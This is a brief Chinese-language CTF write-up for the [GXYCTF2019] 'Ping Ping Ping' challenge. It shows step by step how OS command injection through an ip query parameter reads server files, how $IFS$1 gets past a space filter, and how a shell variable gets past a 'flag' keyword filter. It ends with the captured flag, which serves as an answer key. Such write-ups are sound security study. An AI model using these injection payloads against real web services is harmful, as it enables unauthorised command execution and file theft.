CTF练习日记——[GXYCTF2019]Ping Ping Ping 1

首先尝试一下分号有没有被过滤：?ip=127.0.0.1;ls;

可以看见分号没有被过滤，看到了flag.php和index.php两个文件，先尝试能不能打开flag.php：?ip=127.0.0.1;cat flag.php;

能看出空格被过滤了，我们用$IFS$1绕过空格：?ip=127.0.0.1;cat$IFS$1flag.php;

可以看见flag也被过滤了，我们打开index.php看看：?ip=127.0.0.1;cat$IFS$1index.php;

发现可以利用变量a来绕过flag的过滤：?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

发现什么都没有，但没有失败提示，试试打开页面源码

成功获取flag:flag = "flag{3874c359-41b9-4f7e-bdfa-c25ee4bae813}